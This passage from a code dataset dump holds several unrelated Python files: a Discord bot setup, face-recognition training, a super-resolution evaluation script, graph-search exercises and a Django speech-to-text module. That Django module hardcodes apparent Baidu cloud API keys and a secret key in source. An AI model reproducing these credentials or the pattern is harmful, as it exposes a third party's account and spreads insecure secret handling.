self.student.set_place_of_residence(self.e_place.get())\n","sub_path":"Frames/StudentFrame.py","file_name":"StudentFrame.py","file_ext":"py","file_size_in_byte":18884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526000618","text":"import asyncio\n\nfrom aiocronjob import app, manager\nfrom starlette.testclient import TestClient\n\nclient = TestClient(app=app)\n\n\ndef test_list_jobs(mocker):\n some_datetime = \"2020-06-06T08:39:14.065188+00:00\"\n mock = mocker.patch(\"aiocronjob.job.now\")\n mock.return_value = some_datetime\n\n async def task1():\n await asyncio.sleep(5)\n\n async def task2():\n await asyncio.sleep(5)\n\n manager.register(task1)\n manager.register(task2)\n\n response = client.get(\"/api/jobs\")\n\n desired_output = [\n {\n \"name\": \"Job_0-task1\",\n \"next_run_in\": None,\n \"last_status\": \"created\",\n \"enabled\": \"True\",\n \"crontab\": \"\",\n \"created_at\": some_datetime,\n \"started_at\": None,\n \"stopped_at\": None,\n },\n {\n \"name\": \"Job_1-task2\",\n \"next_run_in\": None,\n \"last_status\": \"created\",\n \"enabled\": \"True\",\n \"crontab\": \"\",\n \"created_at\": some_datetime,\n \"started_at\": None,\n \"stopped_at\": None,\n },\n ]\n\n assert response.json() == desired_output\n","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549718984","text":"import csv\r\nimport logging\r\nimport time\r\nimport asyncio\r\nimport youtube_dl\r\n\r\nasync def init(cli):\r\n global settings\r\n settings = {}\r\n global admins\r\n admins = {}\r\n global banned\r\n banned = {}\r\n global toDoList\r\n toDoList = {}\r\n global client\r\n client = cli\r\n global m\r\n m = None\r\n global musicPlayers\r\n servers = []\r\n for server in client.servers:\r\n servers.append(server.id)\r\n musicPlayers = {k:[] for (k) in servers} #Intended format: {'server ID' : [function, ['list', 'of', 'songs']]}\r\n global logger\r\n\r\n logging.basicConfig(level = logging.INFO)\r\n\r\n logger = logging.getLogger('discord') # tell the logger to exist and give it an alias\r\n\r\n handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\r\n # part of the logger that interacts with files automagically\r\n\r\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\r\n # I can read and understand this, but I don't understand the 
syntax in the string\r\n\r\n logger.addHandler(handler)\r\n return\r\n\r\n\r\ndef keepPlaying(player):\r\n if player.is_done():\r\n logger.info(\"Stopping music.\")\r\n old = musicPlayers[server.id].pop(0)\r\n old.stop()\r\n if len(musicPlayers[server.id]) > 0:\r\n musicPlayers[server.id][0].start()\r\n\r\n\r\nasync def writeSettings():\r\n for server in client.servers:\r\n with open(\"{}.csv\".format(server.id), 'w', newline='') as file:\r\n write = csv.writer(file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\r\n write.writerow(settings[server.name])\r\n write.writerow(admins[server.name])\r\n write.writerow(banned[server.name])\r\n write.writerow(toDoList[server.name])\r\n\r\n\r\nasync def permCheck(lvl, m):\r\n if m.author.id == \"176473884919332864\": #My uID\r\n return True\r\n elif ((m.author.id in admins[m.server.name]) or m.author == m.server.owner) and (lvl == \"admins\"):\r\n return True\r\n elif (m.author.id in banned[m.server.name]):\r\n await client.send_message(m.channel, \"Error: User is banned.\")\r\n return False\r\n elif lvl != \"admins\" and lvl != \"kyle\":\r\n return True\r\n else:\r\n await client.send_message(m.channel, \"Error! Insufficient permissions! Command permission level: {}\".format(lvl))\r\n return False\r\n\r\n","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275568534","text":"\nimport cv2\nimport os\nimport numpy as np\nfrom PIL import Image\nimport pickle\n\n\ncascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nrecognise = cv2.face.LBPHFaceRecognizer_create()\n\n\ndef getdata():\n\n current_id = 0\n label_id = {} \n face_train = [] \n face_label = [] \n \n \n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n my_face_dir = os.path.join(BASE_DIR,'image_data')\n\n\n for root, dirs, files in os.walk(my_face_dir):\n for file in files:\n\n\n if file.endswith(\"png\") or file.endswith(\"jpg\"):\n\n\n path = os.path.join(root, file)\n\n\n label = os.path.basename(root).lower()\n\n \n if not label in label_id:\n label_id[label] = current_id\n current_id += 1\n ID = label_id[label]\n\n\n pil_image = Image.open(path).convert(\"L\")\n\n\n image_array = np.array(pil_image, \"uint8\")\n \n \n face = cascade.detectMultiScale(image_array)\n\n \n for x,y,w,h in face:\n img = image_array[y:y+h, x:x+w]\n \n cv2.imshow(\"Test\",img)\n cv2.waitKey(1)\n face_train.append(img)\n face_label.append(ID)\n\n\n with open(\"labels.pickle\", 'wb') as f:\n pickle.dump(label_id, f)\n \n\n return face_train,face_label\n\n\nface,ids = getdata()\nrecognise.train(face, np.array(ids))\nrecognise.save(\"trainner.yml\")\n","sub_path":"1 - Python - Arduino_Face_ID_Yüz_Tanıma_Güvenlik_Projesi/YÜZ_TANITMAK_İÇİN/3- yuz_verisi_yapay_zeka_egitim.py","file_name":"3- yuz_verisi_yapay_zeka_egitim.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195898859","text":"num_words = int(input())\r\nword_list = sorted(input().strip().split())\r\n\r\nn, m = int(input()), int(input())\r\nboggle = [input().strip().split() for i in range(n)]\r\n\r\ndef in_range(u, v):\r\n return (0 <= u and u < n) and (0 <= v and v < m)\r\n\r\ndef find_what_7(i, u, v, visited, word):\r\n if i + 1 == len(word):\r\n print(word, end=' ')\r\n return 1\r\n\r\n matched_words = 0\r\n for delta_u in [-1, 0, 1]:\r\n for delta_v in [-1, 0, 1]:\r\n if delta_u 
or delta_v:\r\n                next_u, next_v = u + delta_u, v + delta_v\r\n                if in_range(next_u, next_v) and not visited[next_u][next_v]:\r\n                    if boggle[next_u][next_v] == word[i + 1]:\r\n                        visited[next_u][next_v] = True\r\n                        matched_words += find_what_7(i + 1, next_u, next_v, visited, word)\r\n                        visited[next_u][next_v] = False\r\n\r\n    return matched_words\r\n\r\nmatched_words = 0\r\nvisited = [[False for _ in range(m)] for _ in range(n)]\r\nfor word in word_list:\r\n    for u in range(n):\r\n        for v in range(m):\r\n            if word[0] == boggle[u][v]:\r\n                visited[u][v] = True\r\n                matched_words += find_what_7(0, u, v, visited, word)\r\n                visited[u][v] = False\r\n\r\nif matched_words == 0:\r\n    print('0')\r\n","sub_path":"Homework/Group_1/Problem_3.py","file_name":"Problem_3.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"282714559","text":"import json\nimport os\nimport warnings\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nfrom skimage.transform import downscale_local_mean\nfrom skimage import io, img_as_uint\nfrom tqdm import tqdm_notebook, tqdm\nfrom zipfile import ZipFile\nimport torch\nimport cv2\nfrom DataLoader import ImagesetDataset, ImageSet\nfrom DeepNetworks.HRNet import HRNet\nfrom Evaluator import shift_cPSNR, shift_cMSE, cSSIM, cMSE\nfrom utils import getImageSetDirectories, readBaselineCPSNR, collateFunction\n\n\ndef get_sr_and_score(imset, model, aposterior_gt, next_sr, num_frames, min_L=16):\n    '''\n    Super resolves an imset with a given model.\n    Args:\n        imset: imageset\n        model: HRNet, pytorch model\n        min_L: int, pad length\n    Returns:\n        sr: tensor (1, C_out, W, H), super resolved image\n        scPSNR: float, shift cPSNR score\n    '''\n\n    if imset.__class__ is ImageSet:\n        collator = collateFunction(num_frames, min_L=min_L)\n        lrs, alphas, hrs, hr_maps, names = collator([imset])\n    elif isinstance(imset, tuple):  # imset is a tuple of batches\n        lrs, alphas, hrs, hr_maps, names = imset\n\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n    #print(\"LRS SHAPE:\", lrs.shape)\n    #print(\"ALPHAS SHAPE\", alphas.shape)\n\n    #lrs = lrs[:, :num_frames, :, :]\n    #alphas = alphas[:, :num_frames]\n\n    lrs = lrs.float().to(device)\n    alphas = alphas.float().to(device)\n\n    sr = model(lrs, alphas)[:, 0]\n    sr = sr.detach().cpu().numpy()[0]\n    sr = np.clip(sr, 0, 1)\n\n#    sr = downscale_local_mean(sr, (2, 2))\n\n    cur_hr = hrs.numpy()[0]\n    cur_hr_map = hr_maps.numpy()[0]\n    cur_sr = sr\n\n#    cur_hr = downscale_local_mean(cur_hr, (2, 2))\n#    cur_hr_map = downscale_local_mean(cur_hr_map, (2, 2))\n\n    assert(cur_sr.ndim == 2)\n    assert(cur_hr.ndim == 2)\n    assert(cur_hr_map.ndim == 2)\n\n    if cur_sr.dtype.type is np.uint16:  # integer array is in the range [0, 65536]\n        cur_sr = cur_sr / np.iinfo(np.uint16).max  # normalize in the range [0, 1]\n    else:\n        assert 0 <= cur_sr.min() and cur_sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65536) or float64 in (0, 1).'\n    if cur_hr.dtype.type is np.uint16:\n        cur_hr = cur_hr / np.iinfo(np.uint16).max\n\n    if len(hrs) > 0:\n        val_gt_SSIM = cSSIM(sr=cur_sr, hr=cur_hr)\n        val_L2 = mean_squared_error(cur_hr, cur_sr)\n    else:\n        val_gt_SSIM = None\n        val_L2 = None\n\n    if (str(type(aposterior_gt)) == \"<class 'NoneType'>\"):\n        val_aposterior_SSIM = 1.0\n    else:\n        val_aposterior_SSIM = cSSIM(sr = cur_sr, hr = aposterior_gt)\n\n\n    if (str(type(next_sr)) == \"<class 'NoneType'>\"):\n        val_delta_L2 = None\n    else:\n
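        # next_sr is another super-resolved image passed in for comparison; the val_delta_* values below measure how much the two outputs differ.\n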
        assert (next_sr.ndim == 2)\n        val_delta_L2 = mean_squared_error(next_sr, cur_sr)\n\n    if len(cur_sr.shape) == 2:\n        cur_sr = cur_sr[None, ]\n        cur_hr = cur_hr[None, ]\n        cur_hr_map = cur_hr_map[None, ]\n\n    if len(hrs) > 0:\n        val_cMSE = cMSE(sr= cur_sr, hr= cur_hr, hr_map= cur_hr_map)\n        val_cPSNR = -10 * np.log10(val_cMSE)\n        val_usual_PSNR = -10 * np.log10(val_L2)\n        val_shift_cPSNR = shift_cPSNR(sr = cur_sr, hr=cur_hr, hr_map=cur_hr_map)\n        val_shift_cMSE = shift_cMSE(sr = cur_sr, hr=cur_hr, hr_map=cur_hr_map)\n    else:\n        val_cMSE = None\n        val_cPSNR = None\n        val_usual_PSNR = None\n        val_shift_cPSNR = None\n        val_shift_cMSE = None\n\n    if (str(type(next_sr)) == \"<class 'NoneType'>\"):\n        val_delta_cMSE = None\n        val_delta_shift_cMSE = None\n    else:\n        if next_sr.dtype.type is np.uint16:  # integer array is in the range [0, 65536]\n            next_sr = next_sr / np.iinfo(np.uint16).max  # normalize in the range [0, 1]\n        else:\n            assert 0 <= next_sr.min() and next_sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65536) or float64 in (0, 1).'\n\n        if len(cur_sr.shape) == 2:\n            next_sr = next_sr[None,]\n\n        val_delta_cMSE = cMSE(sr = cur_sr, hr = next_sr, hr_map = cur_hr_map)\n        val_delta_shift_cMSE = shift_cMSE(sr = cur_sr, hr = next_sr, hr_map = cur_hr_map)\n\n\n    return sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n           val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, val_delta_shift_cMSE\n\n\ndef load_data(config_file_path, val_proportion=0.10, top_k=-1):\n    '''\n    Loads all the data for the ESA Kelvin competition (train, val, test, baseline)\n    Args:\n        config_file_path: str, paths of configuration file\n        val_proportion: float, validation/train fraction\n        top_k: int, number of low-resolution images to read. Default (top_k=-1) reads all low-res images, sorted by clearance.\n    Returns:\n        train_dataset: torch.Dataset\n        val_dataset: torch.Dataset\n        test_dataset: torch.Dataset\n        baseline_cpsnrs: dict, shift cPSNR scores of the ESA baseline\n    '''\n    \n    with open(config_file_path, \"r\") as read_file:\n        config = json.load(read_file)\n\n    data_directory = config[\"paths\"][\"prefix\"]\n    baseline_cpsnrs = readBaselineCPSNR(os.path.join(data_directory, \"norm.csv\"))\n\n    train_set_directories = getImageSetDirectories(os.path.join(data_directory, \"train\"))\n    test_set_directories = getImageSetDirectories(os.path.join(data_directory, \"test\"))\n\n    # val_proportion = 0.10\n    train_list, val_list = train_test_split(train_set_directories,\n                                            test_size=val_proportion, random_state=1, shuffle=True)\n    # val_list = [\"imgset0000\", \"imgset0061\", \"imgset0203\", \"imgset0280\", \"imgset0374\", \"imgset0476\", \"imgset0585\",\n    #             \"imgset0692\", \"imgset0769\", \"imgset0845\", \"imgset0960\", \"imgset1039\", \"imgset1128\",\n#\"imgset0011\", \"imgset0072\", \"imgset0204\", \"imgset0285\", \"imgset0382\", \"imgset0498\", \"imgset0588\", \"imgset0711\",\n# \"imgset0771\", \"imgset0878\", \"imgset0962\", \"imgset1052\", \"imgset1133\",\n#\"imgset0023\", \"imgset0085\", \"imgset0205\", \"imgset0289\", \"imgset0414\", \"imgset0499\", \"imgset0602\", \"imgset0728\",\n# \"imgset0776\", \"imgset0884\", \"imgset0980\", \"imgset1054\", \"imgset1134\",\n#\"imgset0035\", \"imgset0087\", \"imgset0208\", \"imgset0313\", \"imgset0448\", \"imgset0503\", \"imgset0604\", \"imgset0730\",\n# \"imgset0791\", \"imgset0896\", \"imgset0998\", \"imgset1063\", \"imgset1158\",\n#\"imgset0039\", \"imgset0114\", \"imgset0221\", \"imgset0324\", \"imgset0450\", \"imgset0505\", \"imgset0617\", \"imgset0734\",\n# \"imgset0793\", \"imgset0921\", \"imgset1013\", 
\"imgset1068\",\n#\"imgset0047\", \"imgset0130\", \"imgset0235\", \"imgset0328\", \"imgset0458\", \"imgset0530\", \"imgset0618\", \"imgset0748\",\n# \"imgset0796\", \"imgset0923\", \"imgset1015\", \"imgset1089\",\n#\"imgset0051\", \"imgset0138\", \"imgset0255\", \"imgset0337\", \"imgset0460\", \"imgset0534\", \"imgset0652\", \"imgset0751\",\n# \"imgset0811\", \"imgset0933\", \"imgset1021\", \"imgset1112\",\n#\"imgset0056\", \"imgset0164\", \"imgset0262\", \"imgset0340\", \"imgset0465\", \"imgset0549\", \"imgset0674\", \"imgset0758\",\n# \"imgset0814\", \"imgset0948\", \"imgset1023\", \"imgset1121\",\n#\"imgset0057\", \"imgset0192\", \"imgset0270\", \"imgset0361\", \"imgset0470\", \"imgset0558\", \"imgset0687\", \"imgset0762\",\n# \"imgset0817\", \"imgset0951\", \"imgset1034\", \"imgset1126\"]\n config[\"training\"][\"create_patches\"] = False\n\n train_dataset = ImagesetDataset(imset_dir=train_list, config=config[\"training\"], top_k=top_k)\n val_dataset = ImagesetDataset(imset_dir=val_list, config=config[\"training\"], top_k=top_k)\n test_dataset = ImagesetDataset(imset_dir=test_set_directories, config=config[\"training\"], top_k=top_k)\n return train_dataset, val_dataset, test_dataset, baseline_cpsnrs\n\n\ndef load_model(config, checkpoint_file):\n '''\n Loads a pretrained model from disk.\n Args:\n config: dict, configuration file\n checkpoint_file: str, checkpoint filename\n Returns:\n model: HRNet, a pytorch model\n '''\n \n# checkpoint_dir = config[\"paths\"][\"checkpoint_dir\"]\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n model = HRNet(config[\"network\"]).to(device)\n model.load_state_dict(torch.load(checkpoint_file))\n return model\n\n\ndef evaluate(model, train_dataset, val_dataset, test_dataset, min_L=16):\n '''\n Evaluates a pretrained model.\n Args:\n model: HRNet, a pytorch model\n train_dataset: torch.Dataset\n val_dataset: torch.Dataset\n test_dataset: torch.Dataset\n min_L: int, pad length\n Returns:\n scores: dict, results\n clerances: dict, clearance scores\n part: dict, data split (train, val or test)\n '''\n \n model.eval()\n scores = {}\n clerances = {}\n part = {}\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n for s, imset_dataset in [('train', train_dataset),\n ('val', val_dataset),\n ('test', test_dataset)]:\n\n if __IPYTHON__:\n tqdm = tqdm_notebook\n\n for imset in tqdm(imset_dataset):\n sr, scPSNR = get_sr_and_score(imset, model, min_L=min_L)\n scores[imset['name']] = scPSNR\n clerances[imset['name']] = imset['clearances']\n part[imset['name']] = s\n return scores, clerances, part\n\n\ndef custom_evaluate(model, train_dataset, val_dataset, test_dataset, num_frames, min_L=16):\n\n model.eval()\n scores = {}\n clerances = {}\n part = {}\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n for s, imset_dataset in [('train', train_dataset),\n ('val', val_dataset),\n ('test', test_dataset)]:\n\n if __IPYTHON__:\n tqdm = tqdm_notebook\n\n for imset in tqdm(imset_dataset):\n sr, scPSNR, ssim, aposterior_ssim = get_sr_and_score(imset, model, None, num_frames, min_L)\n # imset, model, aposterior_gt, num_frames, min_L=16\n scores[imset['name']] = scPSNR\n clerances[imset['name']] = imset['clearances']\n part[imset['name']] = s\n return scores, clerances, part\n\ndef benchmark(baseline_cpsnrs, scores, part, clerances):\n '''\n Benchmark scores against ESA baseline.\n Args:\n baseline_cpsnrs: dict, shift cPSNR scores of the ESA baseline\n scores: dict, results\n part: dict, data split (train, val 
or test)\n        clerances: dict, clearance scores\n    Returns:\n        results: pandas.Dataframe, results\n    '''\n    \n    # TODO HR mask clearance\n    results = pd.DataFrame({'ESA': baseline_cpsnrs,\n                            'model': scores,\n                            'clr': clerances,\n                            'part': part, })\n    results['score'] = results['ESA'] / results['model']\n    results['mean_clr'] = results['clr'].map(np.mean)\n    results['std_clr'] = results['clr'].map(np.std)\n    return results\n\n\ndef generate_submission_file(model, imset_dataset, out='../submission'):\n    '''\n    USAGE: generate_submission_file [path to testfolder] [name of the submission folder]\n    EXAMPLE: generate_submission_file data submission\n    '''\n\n    print('generating solutions: ', end='', flush='True')\n    os.makedirs(out, exist_ok=True)\n    if __IPYTHON__:\n        tqdm = tqdm_notebook\n\n    for imset in tqdm(imset_dataset):\n        folder = imset['name']\n        sr, _ = get_sr_and_score(imset, model)\n        sr = img_as_uint(sr)\n\n        # normalize and save resulting image in temporary folder (complains on low contrast if not suppressed)\n        with warnings.catch_warnings():\n            warnings.simplefilter(\"ignore\")\n            io.imsave(os.path.join(out, folder + '.png'), sr)\n        print('*', end='', flush='True')\n\n    print('\\narchiving: ')\n    sub_archive = out + '/submission.zip'  # name of submission archive\n    zf = ZipFile(sub_archive, mode='w')\n    try:\n        for img in os.listdir(out):\n            if not img.startswith('imgset'):  # ignore the .zip-file itself\n                continue\n            zf.write(os.path.join(out, img), arcname=img)\n            print('*', end='', flush='True')\n    finally:\n        zf.close()\n    print('\\ndone. The submission-file is found at {}. Bye!'.format(sub_archive))\n\n    \n    \n\n    \nclass Model(object):\n    \n    def __init__(self, config):\n        self.config = config\n    \n    def load_checkpoint(self, checkpoint_file):\n        self.model = load_model(self.config, checkpoint_file)\n    \n    def __call__(self, imset, aposterior_gt, next_sr, num_frames, custom_min_L = 16):\n        sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n        val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, \\\n        val_delta_shift_cMSE = get_sr_and_score(imset, self.model, aposterior_gt, next_sr, num_frames, min_L= custom_min_L)#self.config['training']['min_L'])\n        return sr, val_gt_SSIM, val_aposterior_SSIM, val_cPSNR, val_usual_PSNR, val_shift_cPSNR, val_cMSE, \\\n        val_L2, val_shift_cMSE, val_delta_cMSE, val_delta_L2, val_delta_shift_cMSE\n    \n    def evaluate(self, train_dataset, val_dataset, test_dataset, baseline_cpsnrs): \n        scores, clearance, part = evaluate(self.model, train_dataset, val_dataset, test_dataset, \n                                           min_L=self.config['training']['min_L'])\n\n        results = benchmark(baseline_cpsnrs, scores, part, clearance)\n        return results\n\n    def custom_evaluate(self, train_dataset, val_dataset, test_dataset, baseline_cpsnrs, num_frames, min_L):\n        scores, clearance, part = custom_evaluate(self.model, train_dataset, val_dataset, test_dataset, num_frames, min_L)\n\n        results = benchmark(baseline_cpsnrs, scores, part, clearance)\n        return results\n    \n    def generate_submission_file(self, imset_dataset, out='../submission'):\n        generate_submission_file(self.model, imset_dataset, out='../submission')\n","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455150320","text":"#2606\n'''Problem\nA new kind of virus, the worm virus, spreads through networks. Once a computer catches the worm virus, every computer connected to it over the network catches it as well.\nFor example, suppose 7 computers are connected on the network as in <Figure 1>. If computer 1 catches the worm virus, the virus spreads through computers 2 and 5 to computers 3 and 6, so the four computers 2, 3, 5 and 6 become infected. Computers 4 and 7, however, are not affected, because they are not connected to computer 1 on the network.\nOne day computer 1 catches the worm virus. Given the number of computers and the information on which computers are connected to each other on the network, write a program that prints the number of computers that become infected with the worm virus through computer 1.\n\nInput\nThe first line contains the number of computers. It is at most 100, and the computers are numbered sequentially starting from 1. The second line contains the number of pairs of computers that are directly connected on the network. Each of the following lines contains one such pair of directly connected computer numbers.\nOutput\nOn the first line, print the number of computers that become infected with the worm virus through computer 1 when computer 1 catches it.\n\nSample Input 1 \n7\n6\n1 2\n2 3\n1 5\n5 2\n5 6\n4 7\nSample Output 1 \n4'''\n'''import sys\ninput = sys.stdin.readline\n\ncomputer = int(input())\nnetwork = int(input())\ngraph = [[0] * (computer + 1) for _ in range(computer + 1)]\nfor _ in range(network):\n    pairs = list(map(int, input().split()))\n    graph[pairs[0]][pairs[1]] = 1\n    graph[pairs[1]][pairs[0]] = 1\n\ndef dfs(start, visited):\n    visited += [start]\n    for i in range(len(graph[start])):\n        if graph[start][i] == 1 and i not in visited:\n            dfs(i, visited)\n    return visited\n\nprint(len(dfs(1, [])) - 1)'''\n\nimport sys\ninput = sys.stdin.readline\n\ncomputer = int(input())\nnetwork = int(input())\ngraph = {}\nfor i in range(computer): #{1: set(), 2: set(), 3: set(), 4: set(), 5: set(), 6: set(), 7: set()}\n    graph[i + 1] = set()\nfor _ in range(network): #{1: {2, 5}, 2: {1, 3, 5}, 3: {2}, 4: {7}, 5: {1, 2, 6}, 6: {5}, 7: {4}}\n    point1, point2 = map(int, input().split())\n    graph[point1].add(point2)\n    graph[point2].add(point1)\n\ndef dfs(start, visited):\n    visited += [start]\n    for i in graph[start]:\n        if i not in visited:\n            dfs(i, visited)\n    return visited\n\ndef bfs(start):\n    visited = [start]\n    queue = [start]\n    \n    while queue:\n        for i in graph[queue.pop(0)]:\n            if i not in visited:\n                visited.append(i)\n                queue.append(i)\n    return visited\nprint(len(dfs(1, [])) - 1)\n","sub_path":"baekjoon/dfs_bfs/2_2606_바이러스.py","file_name":"2_2606_바이러스.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552305075","text":"#####-------------- JASON ADDED BEGIN 20190612 ---------------######\nimport json\nimport datetime\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom sqldb.models import Publisher, LpAudiosMst\nimport cmdb.utils as ResultUtils\nfrom aip import AipSpeech\n\n# import `connection`\nfrom django.db import connection\n\nfrom django.db.models import Q\n\n\"\"\" Baidu Cloud APP ID / API key / secret key \"\"\"\nAPP_ID = '16658280'\nAPI_KEY = 'BUh698CmHcwB70tE9c0S2zEr'\nSECRET_KEY = 'ouv6Rb4ho3sYmkk6WYkmf6cK2xwiIPWu'\n\nclient = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\n\n# insert a recording into the audio master table\ndef insertAudioByCustID(request):\n    error_msg = '录音追加成功'\n\n    newauido=LpAudiosMst()\n    newauido.id = ResultUtils.getUUID()\n    newauido.sales_id = request.POST['salesId']\n    newauido.cust_id = request.POST['custId']\n    newauido.audio_file = request.POST['audioFile']\n    newauido.audio_len = request.POST['audioLen']\n    newauido.audio_text = request.POST['audioText']\n    newauido.create_date = datetime.datetime.now()\n    newauido.update_date = datetime.datetime.now()\n    newauido.status = '1'\n    newauido.save()\n\n    return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n\n# query the recording list\ndef queryAudiosByCustIDorAudioID(request):\n    error_msg = ''\n\n    if request.method == \"POST\":\n        cust_id = request.POST.get('custId')\n        # With an audio ID, return a single recording (including the audio file); without one, return all of the customer's recordings (excluding the audio files)\n        audio_id = request.POST.get('audioId')\n        # Kept for now; may later be used for per-salesperson personalized content\n
        sales_id = request.POST.get('salesId')\n\n        if audio_id is None or len(audio_id.strip()) == 0:\n            # fetch all recordings, without the audio files themselves (too large)\n            sqlmt = \"select id, sales_id, cust_id, \" \\\n                    \"       audio_file, audio_len, audio_text, create_date \" \\\n                    \"  from LP_AUDIOS_MST am \" \\\n                    \" where am.STATUS = '1' \" \\\n                    \"   and am.cust_id = %s \" \\\n                    \"   and am.sales_id = %s \"\n\n            print(sqlmt)\n            ret = ResultUtils.createSuccessResultSqlmt(sqlmt, [cust_id, sales_id])\n        else:\n            # load the blob data, convert it to a file and return the file name -- TBD\n            # not stored as a blob for now; store the audio file path instead and read it online\n            # fetch a single recording, including the audio file\n            sqlmt = \"select id, sales_id, cust_id, \" \\\n                    \"       audio_file, audio_len, audio_text, create_date \" \\\n                    \"  from LP_AUDIOS_MST am \" \\\n                    \" where am.STATUS = '1' \" \\\n                    \"   and am.cust_id = %s \" \\\n                    \"   and am.sales_id = %s \" \\\n                    \"   and id = %s \"\n\n            print(sqlmt)\n            ret = ResultUtils.createSuccessResultSqlmt(sqlmt, [cust_id, sales_id, audio_id])\n\n        print(ret)\n\n        return HttpResponse(ret)\n    else:\n        return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# read a file's raw bytes\ndef get_file_content(filePath):\n    with open(filePath, 'rb') as fp:\n        return fp.read()\n\n# speech to text\ndef translateAudio(filepath):\n    # recognize a local file\n    ret = client.asr(get_file_content(filepath), 'amr', 16000, {\n        'dev_pid': 1536,\n    })\n    return HttpResponse(ret)\n#####-------------- JASON ADDED END 20190612 ---------------######","sub_path":"sqldb/audios.py","file_name":"audios.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"533971707","text":"import time\nimport socket\nfrom threading import Thread\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((socket.gethostname(), 25000))\n\nn = 0\n\n\ndef monitor():\n    global n\n    while True:\n        time.sleep(1)\n        print(n, 'reqs/s')\n        n = 0\n\n\nThread(target=monitor).start()\n\nwhile True:\n    sock.send(b'1')\n    resp = sock.recv(100)\n    n += 1\n","sub_path":"Concurrency_ISSUE/calculate/perf2.py","file_name":"perf2.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"545912879","text":"import os\nfrom os.path import join, dirname\n\nfrom twilio.rest import TwilioRestClient \nfrom dotenv import load_dotenv\n\nfrom twython import Twython \n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n#Twilio Information\nauth = os.environ.get('TWILIO_SID')\ntoken = os.environ.get('TWILIO_SECRET')\nto_phone = os.environ.get('TO_PHONE')\nfrom_phone = os.environ.get('FROM_PHONE')\n\n#Twitter Information\nconsumer_key = os.environ.get('TWITTER_CONSUMER_KEY')\nconsumer_secret = os.environ.get('TWITTER_CONSUMER_SECRET')\naccess_key = os.environ.get('TWITTER_ACCESS_KEY')\naccess_secret = os.environ.get('TWITTER_ACCESS_SECRET') \n\n\ndef text_temp(temperature):\n    msg = 'Solar oven has reached '+temperature+' F'\n\n    client = TwilioRestClient(auth,token) \n    msg = client.messages.create(to=to_phone, from_=from_phone, body=msg)\n    \n    \ndef tweet_temp(temperature):\n    api = Twython(consumer_key,consumer_secret, access_key, access_secret) \n    api.update_status(status=\"Current solar oven temperature = \"+temperature+\" F\") ","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540413778","text":"from sklearn.model_selection import train_test_split\nfrom pandas import to_datetime\n
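# Namespace-style helper class: the methods below take no 'self' and are declared as @staticmethod, so they can be called on the class or on an instance.\n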
DataFrameHelper:\n    def split_dates(dataframe, columns=None):\n        df = dataframe.copy()\n        if columns is None:\n            columns = df.columns.tolist()\n        for column in columns:\n            df[column] = to_datetime(df[column], errors='ignore')\n            for time in ('day', 'month', 'year'):\n                df[f'{column}_{time}'] = getattr(df[column].dt, time)\n        return df\n    def tvt_split(*arrays, set_sizes=(0.8, 0.1, 0.1), **options):\n        \"\"\"\n        Split arrays or matrices into random train,\n        validation, and test subsets\n\n        Wrapper of scikit-learn's train_test_split\n        to have proportioned splitting with validation subset included.\n\n        set_sizes: list-like of ints or floats representing proportion of train,\n        validation, and test subsets, respectively.\n        If floats, must sum up to 1.\n        If ints, must sum up to total observations in dataset.\n\n        Otherwise, all other parameters are passed to train_test_split.\n        I'm not sure what happens if you give train_size or test_size,\n        so programmer beware.\n\n        I'm also not sure if I'm legally allowed to copy and paste\n        the documentation from train_test_split,\n        so you get no information here about it.\n        \"\"\"\n        first_split = set_sizes[0] + 